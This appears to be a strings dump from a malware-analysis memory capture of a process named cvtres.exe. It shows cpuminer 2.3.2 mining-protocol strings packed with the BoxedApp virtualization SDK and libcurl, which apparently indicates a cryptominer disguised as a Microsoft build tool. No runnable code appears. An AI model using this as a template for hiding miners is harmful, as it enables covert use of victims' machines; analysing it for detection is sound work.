\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Telephony\Locations
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\PreviewHandlers
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\KindMap
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\DriveIcons
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\AutoplayHandlers
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Control Panel\Cursors\Schemes
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths
\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates
\REGISTRY\MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates
publicKeyToken
Software\Microsoft\Windows\CurrentVersion\SideBySide\Winners\
!"#$%&'()* ,-./0123456789:;<=>?@
3, 3, 5, 0
BoxedApp, BoxedApp SDK, BoxedApp Packer, BoxedApp.com and some others are trademarks (some of them are registered) of Virtualization Technologies Ltd.
BoxedAppSDK.dll
\libcurl-4.dll
!"#$%&'()* ,-./0123456789:
pthreadgc2.dll
\pthreadgc2.dll
POSIX Threads for Windows LPGL
2, 9, 1, 0
pthreadGC2.DLL
http://sourceware.org/pthreads-win32/
\zlib1.dll
For more information visit http://www.zlib.net/

cvtres.exe_3500_rwx_00400000_00177000:

.text
.data
.rdata
.bss
.idata
.main
.bxpck
libgcj-12.dll
JSON decode of %s failed
http://
https://
stratum tcp://
http://%s
cpuminer 2.3.2
accepted: %lu/%lu (%.2f%%), %s khash/s %s
DEBUG: reject reason: %s
DEBUG: job_id='%s' extranonce2=%s ntime=x
Starting Stratum on %s
...terminating workio thread
...retry after %d seconds
JSON decode failed(%d): %s
{"method": "mining.submit", "params": ["%s", "%s", "%s", "%s", "%s"], "id":4}
{"method": "getwork", "params": [ "%s" ], "id":1}
JSON key '%s' not found
JSON key '%s' is not a string
CURL initialization failed
%s%s%s
Long-polling activated for %s
json_rpc_call failed, retry after %d seconds
DEBUG: got new work in %d ms
Binding thread %d to cpu %d
thread %d: %lu hashes, %s khash/s
Total: %s khash/s
work retrieval failed, exiting mining thread %d
http://127.0.0.1:9332/
%s: unsupported non-option argument '%s'
JSON option %s invalid
https:
%s:%s
thread %d create failed
%d miner threads started, using '%s' algorithm.
cert
userpass
-o, --url=URL URL of mining server (default: http://127.0.0.1:9332/)
-O, --userpass=U:P username:password pair for mining server
-p, --pass=PASSWORD password for mining server
--cert=FILE certificate for mining server using SSL
-x, --proxy=[PROTOCOL://]HOST[:PORT] connect through a proxy
--no-longpoll disable X-Long-Polling support
--no-stratum disable X-Stratum support
[%d-d-d d:d:d] %s
User-Agent: cpuminer/2.3.2
HTTP request failed: %s
JSON-RPC call failed: %s
hex2bin failed on '%s'
DEBUG: %s
Hash: %s
Target: %s
http%s
http_proxy
Stratum connection failed: %s
{"id": 1, "method": "mining.subscribe", "params": []}
{"id": 1, "method": "mining.subscribe", "params": ["cpuminer/2.3.2", "%s"]}
{"id": 1, "method": "mining.subscribe", "params": ["cpuminer/2.3.2"]}
mining.notify
Stratum session id: %s
mining.set_difficulty
client.reconnect
stratum tcp://%s:%d
Server requested reconnection to %s
client.get_version
cpuminer/2.3.2
client.show_message
MESSAGE FROM SERVER: %s
{"id": 2, "method": "mining.authorize", "params": ["%s", "%s"]}
%s near '%s'
%s near end of file
unable to decode byte 0x%x at position %d
control character 0x%x
invalid Unicode '\uX\uX'
invalid Unicode '\uX'
end == saved_text   lex->saved_text.length
unable to open %s: %s
\ux
\ux\ux
mingwm10.dll
__mingwthr_remove_key_dtor
__mingwthr_key_dtor
VirtualQuery failed for %d bytes at address %p
Unknown pseudo relocation protocol version %d.
Unknown pseudo relocation bit size %d.
%s: option requires an argument -- %c
%s: unrecognised option `-%s'
%s: invalid option -- %c
option `%s%s' doesn't accept an argument
option `%s%s' requires an argument
%s: option `%s' is ambiguous
%s: unrecognised option `%s'
0123456789
1399780752 312
curl_easy_cleanup
curl_easy_init
curl_easy_perform
curl_easy_reset
curl_easy_setopt
curl_global_init
curl_slist_append
curl_slist_free_all
curl_version
pthread_join
libcurl-4.dll
KERNEL32.dll
msvcrt.dll
pthreadGC2.dll
WS2_32.dll
KERNEL32.DLL
USER32.DLL
EnumChildWindows
kernel32.dll
ntdll.dll
mscoree.dll
.mixcrt
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
GetProcessWindowStation
operator
USER32.dll
SHELL32.dll
OLEAUT32.dll
GetProcessHeap
GetCPInfo
GetConsoleOutputCP
EXEPackerHost32.exe
?m_IID@@3RCU_IMAGE_IMPORT_DESCRIPTOR@@C
.rdata
.data
.rsrc
.reloc
.\BoxedAppSDK_StaticLib.cpp
BoxedAppSDK_TryCreateProcessForVirtualEXE_AnotherBitnessPartHelper
BoxedAppSDK_AttachMixedBitnessProcessHelper
BoxedAppSDK_EnumVirtualRegKeysA
BoxedAppSDK_EnumVirtualRegKeysW
BoxedAppSDK_ExecuteDotNetApplicationA
BoxedAppSDK_ExecuteDotNetApplicationW
BoxedAppSDK_DeleteVirtualRegKeyByHandle
BoxedAppSDK_DeleteVirtualRegKeyW
BoxedAppSDK_DeleteVirtualRegKeyA
BoxedAppSDK_CreateVirtualRegKeyW
BoxedAppSDK_CreateVirtualRegKeyA
C62E2B35-E4B3-4019-A7C4-F50AC7F78470
Get exe dir...
Get exe dir...done
Get the extension...done
Get current dir...done
Get old args...done
The command line overriding: %s
GetCommandLineW preparing to intercept...done
GetCommandLineA preparing to intercept...done
The embedding BoxedApp into child processes: %s
GetWindowsDirectoryW
RegCreateKeyExW
RegDeleteKeyW
RegCloseKey
ADVAPI32.dll
ole32.dll
EXEPackerStub32.dll
d:\build_area\boxedapp_src\src\boxedappsolution\exepackerstub\!output\exepackerstub32\release_full\EXEPackerStub32.pdb
TryCreateProcessForVirtualEXE, template exe found:
CBoxedAppCore::My_NtDeleteKey, KeyHandle = 0x
CBoxedAppCore::My_NtEnumerateValueKey, KeyHandle = 0x
CBoxedAppCore::My_NtFlushKey, KeyHandle = 0x
CBoxedAppCore::My_NtNotifyChangeKey, KeyHandle = 0x
CBoxedAppCore::My_NtQueryKey, KeyHandle =
CBoxedAppCore::My_NtQueryMultipleValueKey, KeyHandle =
CBoxedAppCore::My_NtSetInformationKey, KeyHandle = 0x
KernelBase.dll
0x%x%x
CBoxedAppCore::My_NtCreateKey, ObjectAttributes = '
CBoxedAppCore::My_NtDeleteValueKey, KeyHandle = 0x
CBoxedAppCore::My_NtLoadKey, DestinationKeyName = '
CBoxedAppCore::My_NtQueryValueKey, KeyHandle = 0x
CBoxedAppCore::My_NtReplaceKey, BackupHiveFileName = '
CBoxedAppCore::My_NtSetValueKey, KeyHandle = 0x
CBoxedAppCore::My_NtUnloadKey, DestinationKeyName = '
CBoxedAppCore::My_NtRenameKey, KeyHandle =
BoxedAppSDK::CBoxedAppCore::TryCreateProcessForVirtualEXE_AnotherBitnessPart
: Can't create process of rundll32.exe, last error =
{4F95F74C-9713-4181-ACDD-8A50195FBC0F}
BoxedAppSDK::CBoxedAppCore::AttachToProcess_WithProcessHelper
BoxedAppSDK::CBoxedAppCore::AttachMixedBitnessProcessHelper
CBoxedAppCore::My_NtLoadKey2, DestinationKeyName = '
CBoxedAppCore::My_NtRestoreKey, KeyHandle = 0x
CBoxedAppCore::My_NtSaveKey, KeyHandle = 0x
:\VirtualDllWithSameImport.dll
:\VirtualDllWithTls.dll
VirtualDllWithTls.dll
VirtualDllWithSameImport.dll
WinExec
advapi32.dll
NtRenameKey
NtUnloadKey
NtSetValueKey
NtSetInformationKey
NtSaveKey
NtRestoreKey
NtReplaceKey
NtQueryValueKey
NtQueryMultipleValueKey
NtQueryKey
NtOpenKeyEx
NtOpenKey
NtNotifyChangeKey
NtLoadKey2
NtLoadKey
NtFlushKey
NtEnumerateValueKey
NtEnumerateKey
NtDeleteValueKey
NtDeleteKey
NtCreateKey
[BOXEDAPP][pid:%d][tid:%d][ %.2d:%.2d:%.2d.%.3d]
FILE_EXECUTE
GENERIC_EXECUTE
KEY_WOW64_64KEY
KEY_WOW64_32KEY
KEY_NOTIFY
KEY_CREATE_LINK
KEY_ENUMERATE_SUB_KEYS
KEY_CREATE_SUB_KEY
KEY_SET_VALUE
KEY_QUERY_VALUE
SECTION_MAP_EXECUTE
PAGE_EXECUTE_WRITECOPY
PAGE_EXECUTE_READWRITE
PAGE_EXECUTE_READ
PAGE_EXECUTE
STATUS_PRIMARY_TRANSPORT_CONNECT_FAILED
STATUS_LOCAL_USER_SESSION_KEY
STATUS_NULL_LM_PASSWORD
STATUS_IMAGE_MACHINE_TYPE_MISMATCH_EXE
STATUS_CARDBUS_NOT_SUPPORTED
STATUS_INVALID_PORT_ATTRIBUTES
STATUS_PORT_MESSAGE_TOO_LONG
STATUS_PORT_DISCONNECTED
STATUS_PORT_CONNECTION_REFUSED
STATUS_INVALID_PORT_HANDLE
STATUS_PORT_ALREADY_SET
STATUS_EAS_NOT_SUPPORTED
STATUS_CTL_FILE_NOT_SUPPORTED
STATUS_WRONG_PASSWORD
STATUS_ILL_FORMED_PASSWORD
STATUS_PASSWORD_RESTRICTION
STATUS_PASSWORD_EXPIRED
STATUS_FLOAT_DENORMAL_OPERAND
STATUS_FLOAT_INVALID_OPERATION
STATUS_PIPE_NOT_AVAILABLE
STATUS_INVALID_PIPE_STATE
STATUS_PIPE_BUSY
STATUS_PIPE_DISCONNECTED
STATUS_PIPE_CLOSING
STATUS_PIPE_CONNECTED
STATUS_PIPE_LISTENING
STATUS_NOT_SUPPORTED
STATUS_PIPE_EMPTY
STATUS_WRONG_PASSWORD_CORE
STATUS_PIPE_BROKEN
STATUS_DISK_OPERATION_FAILED
STATUS_KEY_DELETED
STATUS_KEY_HAS_CHILDREN
STATUS_NO_USER_SESSION_KEY
STATUS_PASSWORD_MUST_CHANGE
STATUS_PORT_UNREACHABLE
STATUS_LOGIN_TIME_RESTRICTION
STATUS_LOGIN_WKSTA_RESTRICTION
STATUS_UNSUPPORTED_COMPRESSION
STATUS_NO_USER_KEYS
STATUS_NOT_EXPORT_FORMAT
STATUS_TRANSPORT_FULL
STATUS_WMI_NOT_SUPPORTED
STATUS_SAM_NEED_BOOTKEY_PASSWORD
STATUS_SAM_NEED_BOOTKEY_FLOPPY
STATUS_STRONG_CRYPTO_NOT_SUPPORTED
STATUS_NOT_SUPPORTED_ON_SBS
STATUS_CSS_KEY_NOT_PRESENT
STATUS_CSS_KEY_NOT_ESTABLISHED
STATUS_NO_KERB_KEY
STATUS_UNSUPPORTED_PREAUTH
STATUS_PORT_NOT_SET
STATUS_INVALID_IMPORT_OF_NON_DLL
STATUS_SMARTCARD_NO_KEY_CONTAINER
STATUS_SMARTCARD_NO_CERTIFICATE
STATUS_SMARTCARD_NO_KEYSET
STATUS_SMARTCARD_CERT_REVOKED
STATUS_SMARTCARD_CERT_EXPIRED
STATUS_SXS_KEY_NOT_FOUND
STATUS_CLUSTER_JOIN_IN_PROGRESS
STATUS_CLUSTER_JOIN_NOT_IN_PROGRESS
RegDeleteKeyExW
NtRequestWaitReplyPort
NtConnectPort
NtReplyPort
NtCompleteConnectPort
NtAcceptConnectPort
NtReplyWaitReceivePort
NtCreateWaitablePort
Imported function,
.data
It's impossible to create virtual file: parent file is virtual, but passed pBehavior is not NULL
It's impossible to create virtual file: passed pBehavior doesn't support Behavior::IVirtualFileStream
It's impossible to create virtual file: parent node is virtual, but passed pBehavior is not NULL
BoxedAppSDK::Registry::Impl::CRegistry::GetAllChildsKeys
NtEnumerateKey() returned unexpected error, status =
, RegTree::IEnumKeyNode::GetNext() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::EnumVirtualRegKeys
, RegTree::IKeyNode::EnumKeys() failed, hr =
: RegTree::IEnumKeyNode::GetNext() failed, hr =
: GetAllChildsKeys() failed, status =
BoxedAppSDK::Registry::Impl::CRegistry::NtQueryKeyInternal
: RegTree::IKeyNode::EnumKeys() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::GetFullRegKeyPath
error, IVirtualKeyHandle_GetFullPath() returned
Invalid key information class:
KeySetHandleTagsInformation is not supported for virtual handle
KeySetDebugInformation is not supported for virtual handle
KeySetVirtualizationInformation is not supported for virtual handle
KeyControlFlagsInformation is not supported for virtual handle
KeyWow64FlagsInformation is not supported for virtual handle
We still don't process NtQueryObject / ObjectBasicInformation for virtual key handles
We still don't process NtQueryObject / ObjectTypeInformation for virtual key handles
: IVirtualKeyHandle::Rename() failed, hr =
: RegTree::IKeyNode::Remove() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::NtRenameKeyInternal
: RegTree::IKeyNode::AddKey() failed, hr =
: result hkey =
: IVirtualKey::CreateKey() failed, hr =
: we can't create a virtual key with its own behavior under another virtual key
: Handles::CreateVirtualKeyHandle() failed, hr =
: IVirtualKey::OpenKey() failed, hr =
: RegImpl::CreateKeyOnSharedMem() failed, hr =
: GetFullRegKeyPath() failed for the hKey =
: Handles::IVirtualKeyHandle::CreateKey() failed and returned
: passed pBehavior is not NULL, but parent key is virtual, so we can't create a key
BoxedAppSDK::Registry::Impl::CRegistry::CreateVirtualRegKey
: lpSubKey: "
BoxedAppSDK::Registry::Impl::CRegistry::SearchStartingFromRealKey
: Handles::CreateVirtualKeyHandle() failed
BoxedAppSDK::Registry::Impl::CRegistry::NtCreateKeyInternal
: SearchStartingFromRealKey() failed
: RegTree::IKeyNode::FindValue() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::NtDeleteValueKeyInternal
: IVirtualKeyHandle::put_Value() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::GetRealKeyLastWriteTime
: NtQueryKey() failed, status =
: NtOpenKey() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::HasRealKeySubKeys
: NtEnumerateValueKey() failed when we tried to get name of the node, status =
: IKeyNode::EnumValues() failed, hr =
: Behavior::IVirtualKeyHandle::EnumKeys() failed, hr =
: Behavior::IVirtualKeyHandle::EnumValues() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::NtEnumerateValueKeyInternal
BoxedAppSDK::Registry::Impl::CRegistry::NtOpenKeyInternal
: invalid KeyInformationClass passed:
: IVirtualKeyHandle_GetFullPath() failed, hr =
: Behavior::IEnumVirtualKey::GetNext() failed, hr =
: IVirtualKeyHandle::EnumValues() failed, hr =
: IVirtualKeyHandle::EnumKeys() failed, hr =
: IVirtualKeyHandle::get_LastWriteTime() failed, hr =
reg:NtQueryMultipleValueKey(
: IKeyNode::FindValue() failed, hr =
: IVirtualKeyHandle::get_Value() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::NtQueryValueKeyInternal
: IVirtualKeyHandle::get_ValueType() failed, hr =
reg:NtSetInformationKey(
RegTree::IKeyNode::RemoveValue() failed, hr
BoxedAppSDK::Registry::Impl::CRegistry::NtSetValueKeyInternal
reg:NtRenameKey(
RegTree::IEnumKeyNode::GetNext(), hr =
RegTree::IKeyNode::EnumKeys(), hr =
: IEnumVirtualKey::GetNext() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::NtDeleteKeyInternal
reg:NtDeleteValueKey(
: NtEnumerateKey() failed when we tried to get name of the node, status =
, Behavior::IVirtualKeyHandle::get_Prop() failed, hr =
, Behavior::IVirtualKey::OpenKey() failed, hr =
: IKeyNode::EnumKeys() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::NtEnumerateKeyInternal
reg:NtEnumerateValueKey(
reg:NtQueryKey(
reg:NtQueryValueKey(
reg:NtSetValueKey(
reg:NtCreateKey(
reg:NtDeleteKey(
reg:NtEnumerateKey(
reg:NtOpenKey(
RegOpenKeyExW
RegOpenKeyW
bxsdk32.dll
d:\build_area\boxedapp_src\src\boxedappsolution\release_full\bxsdk32.pdb
`.rsrc
v2.0.50727
BoxedAppSDK_AppDomainManager.dll
System.Security
.ctor
System.Security.Policy
System.Reflection
System.Runtime.InteropServices
System.Diagnostics
System.Runtime.CompilerServices
System.Collections
System.Security.Permissions
System.IO
DllImportAttribute
shell32.dll
lpCmdLine
1.0.0.0
$87cd9ac9-2a94-4a9b-aee1-8d25d6a19f78
D:\build_area\boxedapp_src\src\BoxedAppSolution\DotNetAppDomainManager\obj\x86\Release_Full\BoxedAppSDK_AppDomainManager.pdb
BoxedAppSDKThunk32.dll
d:\build_area\boxedapp_src\src\boxedappsolution\release_full\BoxedAppSDKThunk32.pdb
.reloc
TLSSupport32.dll
d:\build_area\boxedapp_src\src\boxedappsolution\release_full\TLSSupport32.pdb
libgcj_s.dll
Couldn't open file %s
Can't open %s for writing
Can't get the size of %s
Last-Modified: %s, d %s M d:d:d GMT
%c%c==
%c%c%c=
%c%c%c%c
%s:%d
%5[^:]:%d:%5s
Resolve %s found illegal!
Added %s:%d:%s to DNS cache
timeout on name lookup is not supported
%3lld %s %3lld %s %3lld %s %s %s %s %s %s %s
; filename="%s"
%s; boundary=%s
Content-Type: multipart/mixed, boundary=%s
Content-Type: %s
couldn't open file "%s"
--%s--
p.jpg
p.jpeg
p.txt
p.html
p.xml
#HttpOnly_
httponly
skipped cookie with illegal dotcount domain: %s
skipped cookie with bad tailmatch domain: %s
%s cookie %s="%s" for domain %s, path %s, expire %lld
# Netscape HTTP Cookie File
# http://curl.haxx.se/docs/http-cookies.html
# This file was generated by libcurl! Edit at your own risk.
# Fatal libcurl error
WARNING: failed to save cookies in %s
Avoided giant realloc for header (max is %d)!
HTTP/
The requested URL returned error: %d
%s, d %s M d:d:d GMT
If-Modified-Since: %s
If-Unmodified-Since: %s
Last-Modified: %s
%sAuthorization: Basic %s
%s auth using %s with user '%s'
Referer: %s
Accept-Encoding: %s
%s, TE
Chunky upload is not supported by HTTP 1.0
Host: %s%s%s
Host: %s%s%s:%hu
ftp://
;type=%c
Range: bytes=%s
Content-Range: bytes %s%lld/%lld
Content-Range: bytes %s/%lld
ftp://%s:%s@%s
%s HTTP/%s
%s%s%s%s%s%s%s%s%s%s%s
%s%s=%s
Internal HTTP POST error!
Content-Type: application/x-www-form-urlencoded
Failed sending HTTP POST request
Failed sending HTTP request
HTTP error before end of send, stop sending
HTTP/%d.%d =
HTTP =
RTSP/%d.%d =
The requested URL returned error: %s
HTTP 1.0, assume close after body
HTTP/1.0 proxy connection set to keep alive!
HTTP/1.1 proxy connection set close!
HTTP/1.0 connection set to keep alive!
[%s %s %s]
Recv failure: %s
Send failure: %s
/etc/ssl/certs/ca-certificates.crt
IDN support not present, can't parse Unicode domains
Connected to %s (%s) port %ld (#%ld)
%5[^:@]:%5[^@]
[%*45[0123456789abcdefABCDEF:.]%c
%s://%s%s%s:%hu%s%s%s
Port number too large: %lu
Couldn't resolve host '%s'
Couldn't resolve proxy '%s'
User-Agent: %s
About to connect() to %s%s port %ld (#%ld)
Curl_addHandleToPipeline: length: %d
Closing connection %d
Connection #%ld to host %s left intact
Found bundle for host %s: %p
Server doesn't support pipelining
Connection %d seems to be dead!
[^:]:%[^
:]://%[^
 malformed
:%5[^@]
Protocol %s not supported or disabled in libcurl
%s://%s
Couldn't find host %s in the _netrc file; using defaults
ftp@example.com
Found connection %d, with requests in the pipe (%d)
Re-using existing connection! (#%ld) with host %s
CURLOPT_SSL_VERIFYHOST no longer supports 1 as value!
Operation too slow. Less than %ld bytes/sec transferred the last %ld seconds
zlib/%s
7.30.0
%%X
login
password
[^?&/:]://%c
Issue another request to this URL: '%s'
Violate RFC 2616/10.3.2 and switch from POST to GET
Violate RFC 2616/10.3.3 and switch from POST to GET
Disables POST, goes with %s
No URL set!
seek callback returned error %d
the ioctl callback returned %d
ioctl callback returned error %d
operation aborted by callback
Rewinding stream by : %zd bytes on url %s (zero-length body)
Excess found in a non pipelined read: excess = %zd url = %s (zero-length body)
HTTP server doesn't seem to support byte ranges. Cannot resume.
Problem (%d) in the Chunked-Encoded data
Rewinding stream by : %zu bytes on url %s (size = %lld, maxdownload = %lld, bytecount = %lld, nread = %zd)
Excess found in a non pipelined read: excess = %zu, size = %lld, maxdownload = %lld, bytecount = %lld
Unrecognized content encoding type. libcurl understands `identity', `deflate' and `gzip' content encodings.
Operation timed out after %ld milliseconds with %lld out of %lld bytes received
Operation timed out after %ld milliseconds with %lld bytes received
pUnrecognized content encoding type. libcurl understands `identity', `deflate' and `gzip' content encodings.
psa_addr inet_ntop() failed with errno %d: %s
Trying %s...
Could not set TCP_NODELAY: %s
TCP_NODELAY set
Failed to set SO_KEEPALIVE on fd %d
Failed to set SIO_KEEPALIVE_VALS on fd %d: %d
Couldn't bind to interface '%s'
Local Interface %s is ip %s using address family %i
Name '%s' family %i resolved to '%s' family %i
Couldn't bind to '%s'
getsockname() failed with errno %d: %s
Local port: %hu
Bind to local port %hu failed, trying next
bind failed with errno %d: %s
Failed to connect to %s: %s
couldn't connect to %s at %s:%d
getpeername() failed with errno %d: %s
ssrem inet_ntop() failed with errno %d: %s
ssloc inet_ntop() failed with errno %d: %s
Failed connect to %s:%ld; %s
pInternal error clearing splay node = %d
Internal error removing splay node = %d
pPipe broke: handle 0x%p, url = %s
In state %d with no easy_conn, bail out!
Error while processing content unencoding: %s
1.2.8
1.2.0.4
px
%s:%s:%s
%s:%.*s
%s:%s:x:%s:%s:%s
%sAuthorization: Digest username="%s", realm="%s", nonce="%s", uri="%s", cnonce="%s", nc=x, qop=%s, response="%s"
%sAuthorization: Digest username="%s", realm="%s", nonce="%s", uri="%s", response="%s"
%s, opaque="%s"
%s, algorithm="%s"
Unsupported protocol
URL using bad/illegal format or missing URL
A requested feature, protocol or option was not found built-in in this libcurl due to a build-time decision.
FTP: weird server reply
FTP: The server failed to connect to data port
FTP: Accepting server connect has timed out
FTP: The server did not accept the PRET command.
FTP: unknown PASS reply
FTP: unknown PASV reply
FTP: unknown 227 response format
FTP: can't figure out the host in the PASV response
FTP: couldn't set file type
FTP: couldn't retrieve (RETR failed) the specified file
HTTP response code said error
FTP: command PORT failed
FTP: command REST failed
Operation was aborted by an application callback
A libcurl function was given a bad argument
An unknown option was passed in to libcurl
SSL peer certificate or SSH remote key was not OK
Problem with the local SSL certificate
Peer certificate cannot be authenticated with given CA certificates
Problem with the SSL CA cert (path? access rights?)
Unrecognized or bad HTTP Content or Transfer-Encoding
Invalid LDAP URL
Issuer check against peer certificate failed
Login denied
TFTP: File Not Found
TFTP: Access Violation
TFTP: Illegal operation
TFTP: Unknown transfer ID
TFTP: No such user
Caller must register CURLOPT_CONV_ callback options
Error in the SSH layer
Unable to parse FTP file list
Please call curl_multi_perform() soon
CURLSHcode unknown
Protocol option is unsupported
Protocol is unsupported
Socket is unsupported
Operation not supported
Address family not supported
Protocol family not supported
Winsock version not supported
Unknown error %d (%#x)
Curl_ipv4_resolve_r failed for %s
%d.%d.%d.%d
d:d:d
d:d
User was rejected by the SOCKS5 server (%d %d).
SOCKS5 GSSAPI per-message authentication is not supported.
No authentication method was acceptable. (It is quite likely that the SOCKS5 server wanted a username/password, since none was supplied to the server on this connection.)
Failed to resolve "%s" for SOCKS5 connect.
Can't complete SOCKS5 connection to %d.%d.%d.%d:%d. (%d)
Can't complete SOCKS5 connection to %s:%d. (%d)
Can't complete SOCKS5 connection to xx:xx:xx:xx:xx:xx:xx:xx:%d. (%d)
Failed to resolve "%s" for SOCKS4 connect.
SOCKS4%s request granted.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected or failed.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because SOCKS server cannot connect to identd on the client.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because the client program and identd report different user-ids.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), Unknown.
Establish HTTP proxy tunnel to %s:%hu
%s:%hu
%s%s%s:%hu
Host: %s
CONNECT %s HTTP/%s
%s%s%s%s
HTTP/1.%d %d
TUNNEL_STATE switched to: %d
Received HTTP code %d from proxy after CONNECT
%s/%s
username="%s",realm="%s",nonce="%s",cnonce="%s",nc="%s",digest-uri="%s",response=%s
00000001
12345678
%s xxxxxxxxxxxxxxxx
- Conn %d (%p) send_pipe: %d, recv_pipe: %d
Server %s is blacklisted
Server %s is not blacklisted
Site %s:%d is pipeline blacklisted
Adding handle: send: %d
Adding handle: recv: %d
Conn: %d (%p) Receive pipe weight: (%d/%d), penalized: %d
curl_easy_duphandle
curl_easy_escape
curl_easy_getinfo
curl_easy_pause
curl_easy_recv
curl_easy_send
curl_easy_strerror
curl_easy_unescape
curl_escape
curl_formadd
curl_formfree
curl_formget
curl_free
curl_getdate
curl_getenv
curl_global_cleanup
curl_global_init_mem
curl_maprintf
curl_mfprintf
curl_mprintf
curl_msnprintf
curl_msprintf
curl_multi_add_handle
curl_multi_assign
curl_multi_cleanup
curl_multi_fdset
curl_multi_info_read
curl_multi_init
curl_multi_perform
curl_multi_remove_handle
curl_multi_setopt
curl_multi_socket
curl_multi_socket_action
curl_multi_socket_all
curl_multi_strerror
curl_multi_timeout
curl_multi_wait
curl_mvaprintf
curl_mvfprintf
curl_mvprintf
curl_mvsnprintf
curl_mvsprintf
curl_share_cleanup
curl_share_init
curl_share_setopt
curl_share_strerror
curl_strequal
curl_strnequal
curl_unescape
curl_version_info
ADVAPI32.DLL
WS2_32.DLL
zlib1.dll
DllMainCRTStartup
GNU C 4.2.1-sjlj (mingw32-2)
/home/ron/devel/debian/mingw32-runtime/mingw32-runtime-3.13/build_dir/src/mingw-runtime-3.13-20070825-1/dllcrt1.c
 DllMainCRTStartup@12
dllcrt1.c
.file
http.c
ftp.c
url.c
_Curl_do
curl_fnmatch.c
ftplistparser.c
http_chunks.c
http_digest.c
curl_rand.c
http_negotiate.c
tftp.c
ssh.c
curl_addrinfo.c
curl_sspi.c
curl_memrchr.c
smtp.c
curl_threads.c
curl_rtmp.c
curl_gethostname.c
http_proxy.c
curl_gssapi.c
curl_ntlm.c
curl_ntlm_wb.c
curl_ntlm_core.c
curl_ntlm_msgs.c
curl_sasl.c
curl_schannel.c
curl_multibyte.c
curl_darwinssl.c
pipeline.c
.debug_aranges
.debug_pubnames
.debug_info
.debug_abbrev
.debug_line
.debug_frame
.debug_loc
_DllMainCRTStartup@12
_curlx_tvdiff
_curlx_tvdiff_secs
_Curl_tvlong
_curlx_tvnow
_Curl_base64_encode
_Curl_base64_decode
_Curl_num_addresses
_Curl_resolv_unlock
_Curl_hostcache_clean
_Curl_hostcache_destroy
_Curl_mk_dnscache
_Curl_hostcache_prune
_Curl_cache_addr
_Curl_loadhostpairs
_Curl_resolv
_Curl_resolv_timeout
_Curl_printable_address
_Curl_global_host_cache_dtor
_Curl_global_host_cache_init
_Curl_pgrsSetDownloadCounter
_Curl_pgrsSetUploadCounter
_Curl_pgrsSetDownloadSize
_Curl_pgrsSetUploadSize
_Curl_pgrsResetTimesSizes
_Curl_pgrsStartNow
_Curl_pgrsUpdate
_Curl_pgrsDone
_Curl_pgrsTime
_Curl_formclean
_curl_formfree
_Curl_FormInit
_Curl_formpostheader
_Curl_FormReader
_Curl_getformdata
_curl_formget
_curl_formadd
_Curl_cookie_freelist
_Curl_cookie_clearall
_Curl_cookie_clearsess
_Curl_cookie_cleanup
_Curl_cookie_list
_Curl_cookie_getlist
_Curl_cookie_add
_Curl_cookie_init
_Curl_cookie_loadfiles
_Curl_flush_cookies
_http_should_fail
_Curl_add_buffer_init
_http_getsock_do
_use_http_1_1
_Curl_add_buffer
_checkhttpprefix
_Curl_checkheaders
_Curl_compareheader
_http_perhapsrewind
_Curl_http_auth_act
_Curl_http_done
_Curl_http_connect
_Curl_add_bufferf
_Curl_add_timecondition
_Curl_add_custom_headers
_Curl_add_buffer_send
_Curl_http_input_auth
_Curl_http_output_auth
_Curl_http
_Curl_http_readwrite_headers
_Curl_write
_Curl_debug
_Curl_read
_Curl_read_plain
_Curl_sendf
_Curl_failf
_Curl_client_write
_Curl_recv_plain
_Curl_send_plain
_Curl_write_plain
_Curl_infof
_Curl_freeset
_Curl_init_userdefined
_Curl_protocol_getsock
_Curl_doing_getsock
_Curl_protocol_connecting
_Curl_protocol_doing
_Curl_reset_reqproto
_Curl_do_more
_Curl_verboseconnect
_Curl_isPipeliningEnabled
_IsPipeliningPossible
_parse_remote_port
_Curl_open
_Curl_protocol_connect
_Curl_connected_proxy
_Curl_setup_conn
_Curl_removeHandleFromPipeline
_Curl_getoff_all_pipelines
_Curl_addHandleToPipeline
_signalPipeClose
_Curl_disconnect
_Curl_done
_Curl_handler_dummy
_Curl_connect
_Curl_setopt
_Curl_close
_Curl_dupset
_Curl_if_is_interface_name
_Curl_if2ip
_Curl_speedcheck
_Curl_speedinit
_curl_version_info
_curl_version
_curl_getenv
_curl_free
_Curl_urldecode
_curl_easy_unescape
_curl_unescape
_curl_easy_escape
_curl_escape
_curl_msnprintf
_curl_mvfprintf
_curl_mvprintf
_curl_mvsprintf
_curl_mfprintf
_curl_mprintf
_curl_msprintf
_curl_mvaprintf
_curl_maprintf
_curl_mvsnprintf
_Curl_parsenetrc
_Curl_initinfo
_Curl_getinfo
_Curl_single_getsock
_Curl_sleep_time
_Curl_posttransfer
_strlen_url
_strcpy_url
_Curl_setup_transfer
_Curl_meets_timecondition
_Curl_reconnect_request
_Curl_follow
_Curl_pretransfer
_Curl_readrewind
